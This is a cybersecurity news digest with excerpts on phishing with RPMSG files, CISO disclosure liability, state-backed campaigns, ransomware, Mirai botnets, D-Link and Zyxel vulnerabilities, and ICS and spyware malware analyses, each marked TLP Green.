Top News

• Microsoft 365 phishing attacks use encrypted RPMSG messages

"Attackers are now using encrypted RPMSG attachments sent via compromised Microsoft 365 accounts to steal Microsoft credentials in targeted phishing attacks designed to evade detection by email security gateways.
RPMSG files (also known as restricted permission message files) are encrypted email message attachments created using Microsoft's Rights Management Services (RMS) and offer an extra layer of protection to sensitive info by restricting access to authorized recipients.
Recipients who want to read them must authenticate using their Microsoft account or obtain a one-time passcode to decrypt the contents. 
As Trustwave recently discovered, RPMSG's authentication requirements are now being exploited to trick targets into handing over their Microsoft credentials using fake login forms.

Link

TLP¹ : Green

• CISO Criminalization, Vague Cyber Disclosure Rules Create Angst for Security Teams

"Getting cybersecurity incident disclosure right can mean the difference between prison and freedom. But the rules remain woefully vague.
Chief information security officers (CISOs) and their teams know there's a certain amount of risk intrinsically baked into the job. But the recent sentencing of former Uber CISO Joseph Sullivan for his role in covering up a 2016 data breach at the company has significantly upped the ante. 
SolarWinds CISO Tim Brown survived one of the most spectacular security breaches in history in 2020 in an epic supply chain attack, and emerged on the other side with the business — and his professional reputation — intact. In an interview with Dark Reading, he explained that CISOs are asking for clarity on rules around disclosures. The Federal Trade Commission (FTC) has rules, and beyond that, there is a vast and evolving mousetrap of rules, regulations, executive orders, and case law dictating how and when disclosures need to occur, and that's before anyone considers the impact of an incident on the business."

Link

TLP¹ : Green

Cybersecurity State: Surveillance, Cyberwarfare, Cybercriminality and Hacktivism

• 'Volt Typhoon' Breaks Fresh Ground for China-Backed Cyber Campaigns

"News this week that a likely China-backed threat actor is targeting critical infrastructure organizations in Guam has once again raised the specter of America's geopolitical adversaries launching disruptive cyberattacks against key communications and operational technologies in a future crisis.
The attacks are part of a broader campaign dubbed "Volt Typhoon" that Microsoft reported this week as targeting organizations in the communications, government, utility, manufacturing, maritime, and other critical sectors. Like most state-backed Chinese cyber campaigns over the past several years, the primary focus of Volt Typhoon at first appears to be cyber espionage."

Link

TLP¹ : Green

• Organizations Worldwide Targeted in Rapidly Evolving Buhti Ransomware Operation

"A recently identified ransomware operation called Buhti is using LockBit and Babuk variants to target both Linux and Windows systems, Symantec reports.
Initially observed in February 2023, the Buhti operation, which Symantec calls Blacktail, has been rapidly expanding since mid-April, exploiting recent vulnerabilities for initial access, and relying on a custom tool to steal victim files.
In a recent attack, the Buhti operators used a minimally modified version of the LockBit 3.0 (LockBit Black) ransomware to target Windows machines. The builder for LockBit leaked online in September 2022.
Previously, the operators were seen targeting Linux systems with the Golang-based variants of Babuk, the first ransomware to target ESXi systems. Babuk’s code leaked online in 2021."

Link

TLP¹ : Green

Breaches: Data Breaches and Hacks

• Zyxel Firewalls Hacked by Mirai Botnet via Recently Patched Vulnerability

"The Taiwan-based networking device manufacturer informed customers about the security hole on April 25, when it announced the availability of patches for impacted ATP, VPN, USG Flex and ZyWALL/USG firewalls.
The OS command injection vulnerability, found by Trapa Security, is caused by improper error message handling in some firewalls, and it could allow an unauthenticated attacker to remotely execute OS commands by sending specially crafted packets to the targeted device."

Link

TLP¹ : Green

Vulnerabilities: Vulnerability Advisories, Zero-Days, Patches and Exploits

• D-Link fixes auth bypass and RCE flaws in D-View 8 software

"D-Link has fixed two critical-severity vulnerabilities in its D-View 8 network management suite that could allow remote attackers to bypass authentication and execute arbitrary code.
D-View is a network management suite developed by the Taiwanese networking solutions vendor D-Link, used by businesses of all sizes for monitoring performance, controlling device configurations, creating network maps, and generally making network management and administration more efficient and less time-consuming.
Security researchers participating in Trend Micro's Zero Day Initiative (ZDI) discovered six flaws impacting D-View late last year and reported them to the vendor on December 23, 2022.
Two of the discovered vulnerabilities are critical severity (CVSS score: 9.8) and give unauthenticated attackers strong leverage over affected installations."

Link

TLP¹ : Green

• New COSMICENERGY Malware Exploits ICS Protocol to Sabotage Power Grids

"A new strain of malicious software that's engineered to penetrate and disrupt critical systems in industrial environments has been unearthed.
Google-owned threat intelligence firm Mandiant dubbed the malware COSMICENERGY, adding it was uploaded to a public malware scanning utility in December 2021 by a submitter in Russia. There is no evidence that it has been put to use in the wild.
"The malware is designed to cause electric power disruption by interacting with IEC 60870-5-104 (IEC-104) devices, such as remote terminal units (RTUs), that are commonly leveraged in electric transmission and distribution operations in Europe, the Middle East, and Asia," the company said.
COSMICENERGY is the latest addition to specialized malware like Stuxnet, Havex, Triton, IRONGATE, BlackEnergy2, Industroyer, and PIPEDREAM, which are capable of sabotaging critical systems and wreaking havoc."

Link

TLP¹ : Green

Incident Response: Infrastructure, Training, SIEM and Incident Handling

• Security Pros: Before You Do Anything, Understand Your Threat Landscape

"Regardless of the use case your security organization is focused on – alert triage, threat hunting, spear phishing, incident response, or risk-based vulnerability management, to name a few –  you’ll likely waste time and resources and make poor decisions if you don’t start with understanding your threat landscape. What do I mean by that?
As security professionals our tendency is to start with the great unknown – all the threat feeds and sources of external threat data available that combine to form the threat universe. The problem with starting there is that you quickly end up with a big data problem – an overwhelming amount of data from the multiple sources your organization subscribes to – commercial, open source, government, industry, existing security vendors – as well as frameworks like MITRE ATT&CK. Not to mention RSS feeds, news websites, research blogs, and GitHub repositories that analysts use to keep up with emerging threat information and trends. "

Link

TLP¹ : Green

• Watch Now: Threat Detection and Incident Response Virtual Summit

"All sessions from SecurityWeek’s Threat Detection & Incident Response Summit  are now available to watch on demand.
This fully immersive online event brought together security practitioners from around the world to share war stories on breaches and the murky world of high-end cyberattacks."

Link

TLP¹ : Green

Technical Articles: Forensics, Reverse Engineering, Malware, Phishing, Pentesting, Software Security and Cryptography

• Mercenary mayhem: A technical analysis of Intellexa's PREDATOR spyware

"We would like to thank The Citizen Lab for their cooperation, support and inputs into this research.
Commercial spyware use is on the rise, with actors leveraging these sophisticated tools to conduct surveillance operations against a growing number of targets. Cisco Talos has new details of a commercial spyware product sold by the spyware firm Intellexa (formerly known as Cytrox).
Our research specifically looks at two components of this mobile spyware suite known as “ALIEN” and “PREDATOR,” which compose the backbone of the spyware implant. Our findings include an in-depth walkthrough of the infection chain, including the implants’ various information-stealing capabilities.
A deep dive into both spyware components indicates that ALIEN is more than just a loader for PREDATOR and actively sets up the low-level capabilities needed for PREDATOR to spy on its victims.
We assess with high confidence that the spyware has two additional components — tcore (main component) and kmem (privilege escalation mechanic) — but we were unable to obtain and analyze these modules.
If readers suspect their system(s) may have been compromised by commercial spyware, please consider notifying Talos’ research team at talos-mercenary-spyware-help@external.cisco.com to assist in furthering the community’s knowledge of these threats."

Link

TLP¹ : Green

• NCC Group Releases Open Source Tools for Developers, Pentesters

"Cybersecurity firm NCC Group has released new open source tools that can be useful to application developers and penetration testers.
The first, named Code Credential Scanner (css), can be used by developers to scan configuration files in a repository to detect any stored credentials and remove them before they are leaked.
The tool runs on a local filesystem, meaning that it can be executed at any time to scan local files. It can also be integrated into development mechanisms to perform automated scheduled scans."

Link

TLP¹ : Green

• Old Wine in the New Bottle: Mirai Variant Targets Multiple IoT Devices

"On April 10, Unit 42 researchers observed a Mirai variant called IZ1H9, which used several vulnerabilities to spread itself. The threat actors use the following vulnerabilities to target exposed servers and networking devices running Linux:    
CVE-2023-27076: Tenda G103 command injection vulnerability
CVE-2023-26801: LB-Link command injection vulnerability
CVE-2023-26802: DCN DCBI-Netlog-LAB remote code execution vulnerability
Zyxel remote code execution vulnerability
Compromised devices can be fully controlled by attackers and become a part of the botnet. Those devices can be used to conduct further attacks, such as distributed denial-of-service (DDoS) attacks."

Link

TLP¹ : Green

¹Traffic Light Protocol (TLP) [1] for information sharing:

• Red:Not for disclosure, restricted to participants only.
• Amber: Limited disclosure, restricted to participants organizations.
• Green: Limited disclosure, restricted to the community.

[1]https://www.first.org/tlp